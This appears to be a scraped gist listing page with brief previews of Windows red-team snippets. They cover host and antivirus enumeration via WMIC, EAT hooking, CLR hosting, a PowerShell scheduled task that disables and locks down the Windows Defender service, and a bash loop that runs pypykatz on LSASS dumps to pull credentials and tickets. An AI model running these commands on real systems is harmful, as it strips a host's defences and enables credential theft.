This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Host Enumeration: | |
--- OS Specifics --- | |
wmic os LIST Full (* To obtain the OS Name, use the "caption" property) | |
wmic computersystem LIST full | |
--- Anti-Virus --- | |
wmic /namespace:\\root\securitycenter2 path antivirusproduct |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* EAT-based hooking for x86/x64. | |
* | |
* Big thanks to ez (https://github.com/ezdiy/) for making this! | |
* | |
* Creates "hooks" by modifying the module's export address table. | |
* The procedure works in three main parts: | |
* | |
* 1. Reading the module's PE file and getting all exported functions. | |
* 2. Finding the right function to "hook" by simple address lookup |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* fork.c | |
* Experimental fork() on Windows. Requires NT 6 subsystem or | |
* newer. | |
* | |
* Copyright (c) 2012 William Pitcock <nenolod@dereferenced.org> | |
* | |
* Permission to use, copy, modify, and/or distribute this software for any | |
* purpose with or without fee is hereby granted, provided that the above | |
* copyright notice and this permission notice appear in all copies. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* | |
* List process information on windows without opening any handles, including process architecture and username | |
* | |
*/ | |
#include <Windows.h> | |
#include <stdio.h> | |
#include <math.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
$svc = New-Object -ComObject 'Schedule.Service' | |
$svc.Connect() | |
$user = 'NT SERVICE\TrustedInstaller' | |
$folder = $svc.GetFolder('\') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
if [ "$1" = "-h" -o "$1" = "--help" -o -z "$1" ]; then cat <<EOF | |
appify v3.0.1 for Mac OS X - http://mths.be/appify | |
Creates the simplest possible Mac app from a shell script. | |
Appify takes a shell script as its first argument: | |
`basename "$0"` my-script.sh |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
BSD 3-Clause License | |
Copyright (c) 2019 Odzhan. All rights reserved. | |
Redistribution and use in source and binary forms, with or without | |
modification, are permitted provided that the following conditions are met: | |
* Redistributions of source code must retain the above copyright notice, this | |
list of conditions and the following disclaimer. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
BSD 3-Clause License | |
Copyright (c) 2019 Odzhan. All rights reserved. | |
Redistribution and use in source and binary forms, with or without | |
modification, are permitted provided that the following conditions are met: | |
* Redistributions of source code must retain the above copyright notice, this | |
list of conditions and the following disclaimer. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "stdafx.h" | |
int main() | |
{ | |
ICLRMetaHost *metaHost = NULL; | |
IEnumUnknown *runtime = NULL; | |
ICLRRuntimeInfo *runtimeInfo = NULL; | |
ICLRRuntimeHost *runtimeHost = NULL; | |
IUnknown *enumRuntime = NULL; | |
LPWSTR frameworkName = NULL; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# prereqs: pypykatz, all the dumps in current working dir | |
mkdir ./ppktz_tickets 2>/dev/null | |
ext='.dmp' | |
for i in *$ext; do | |
txtfile=${i::-3}txt | |
secrets=${i::-3}secrets | |
pypykatz lsa minidump $i -o $txtfile -k ./ppktz_tickets/; |
NewerOlder